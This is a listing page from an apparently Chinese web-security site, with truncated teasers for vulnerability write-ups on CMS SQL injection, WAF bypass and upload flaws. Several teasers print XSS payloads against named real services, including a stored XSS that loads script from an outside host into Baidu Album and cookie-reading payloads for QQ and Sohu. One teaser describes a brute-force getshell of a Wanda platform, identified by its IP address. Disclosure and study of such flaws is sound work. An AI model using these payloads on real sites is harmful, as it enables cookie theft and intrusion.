DedeCMS最新通杀注入(buy_action.php)漏洞分析 - 网站安关注热度:25

0x00 前言前两天，乌云白帽子提交了两个DedeCMS的通杀注入漏洞，闹得沸沸扬扬，25号织梦官方发布了补丁，于是就下载最新代码回来做了对比，这里简单的分析下其中的一个注入。0x01 漏..[详情]

深入理解SQL注入绕过WAF和过滤机制 - 网站安全关注热度:10

知己知彼，百战不殆 --孙子兵法[目录]0x0 前言0x1 WAF的常见特征0x2 绕过WAF的方法0x3 SQLi Filter的实现及Evasion0x4 延伸及测试向量示例0x5 本文小结0x6 参考资料0x0 前言促使本文产生最初的动机..[详情]

应急响应中web后门排查与高效分析web日志技巧关注热度:10

举例事件场景： XX公司网站首页被做了搜索引擎劫持，跳转到博彩网站，XX公司技术负责人早上9点10分发现情况，联系到我们公司，希望给他们做一次远程应急，需求是[清除web后门，分..[详情]

百度相册存储型XSS漏洞指谁打谁，可对用户留置关注热度:10

1 插入不要闭合的代码：script src=http: q601333824 duapp com 3 js2 代码存在的位置3 评论变成了null,但是百度首页有提醒，个人中心也能弹出来修复方案：过滤..[详情]

siteserver最新版3.6.4 sql inject 第十蛋 - 网站安全关注热度:22

第11个注入存在 siteserver cms console_logSite aspx用 NET Reflector 反编译SiteServer CMS dll这个文件查看代码如下：public void Page_Load(object sender, EventArgs E){ int num; E..[详情]

上传漏洞科普[1]-文件上传表单是Web安全主要威胁关注热度:10

为了让最终用户将文件上传到您的网站，就像是给危及您的服务器的恶意用户打开了另一扇门。即便如此，在今天的现代互联网的Web应用程序，它是一种 常见的要求，因为它有助于提高..[详情]

手动web应用程序渗透测试-模糊测试中的后缀与前关注热度:15

介绍本文重点讲述采用模糊测试的方法测试目标Web应用程序时，可利用的前缀和后缀语法。句法后缀语法-字母字符+特殊字符（Suffix Syntax ndash; AlphabeticsSpecialcharacters）指字母字符后加特..[详情]

清竹虚拟主机管理系统sql注入 + 后台构造cookie登关注热度:16

清竹虚拟主机管理系统sql注入漏洞NCompany Index asploadfile_fromcache templatePathNCompany-Index html 39;加载index html模板TempCon=TempConApplication(Qz_TP_templatePathNComp..[详情]

phpcms v9 SQL注入漏洞（第二弹） - 网站安全 - 自学关注热度:12

漏洞文件发生在phpcms modules member index php中392行public function account_manage_info() { account_manage_info方法，就是更新个人资料if(isset($_POST[ 39;dosubmit 39;])) { 更新用户昵称$..[详情]

腾讯视频主站分享至微信xss一枚，可cookie哦！关注热度:15

http: v qq com share weixin html?url=javascript：alert(document cookie)title=分享至微信分享至微信url过滤不严 导致xsshttp: v qq com share weixin html?url=javascript：alert(document cookie)titl..[详情]

搜狐家居论坛有一个通杀所有子论坛的xss - 网站关注热度:9

随便找一个论坛链接http: home focus cn msgview 1632 270131257 html在个人签名处输入：pimg height=0 onerror=alert( 亲，这里有个xss漏洞你们知道吗 );alert(document cookie) src= width=0..[详情]

TCCMS某处设计缺陷，成功打入官网后台 - 网站安全关注热度:12

问题发生在app controller user class php146行public function update() {$_Obj = M ( 39;user 39; );if (($_POST [ 39;info 39;] [ 39;password 39;] !== $_POST [ 39;password1 39;])..[详情]

Flash XSS 漏洞详解 根治的好办法 - 网站安全 - 自学关注热度:14

本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞，并提出比较有效的解决方案。首先，我们看看什么情况下，会出现XSS。第一种情况：把flashvars传入的参数（或者其他能被别人控..[详情]

如何构建安全的Web应用程序 - 网站安全 - 自学p关注热度:15

多年以来，安全专家们都在警告人们Web应用程序的漏洞，而这些警告往往会变成现实。我们经常看到这样的报道：黑客成功地渗透进入了一个Web应用。黑客或网络罪犯们也在共享新发现..[详情]

万达某产品公众管理平台Getshell至站点沦陷 - 网站关注热度:12

沦陷站点：万达大歌星微信公众管理平台http: 222 222 121 167 由于验证码缺陷可爆破进入系统admin管理员用户，此处不表 微信管理平台嘛就有管理功能，稍微贴两张图菜单管理粉丝统计可帮..[详情]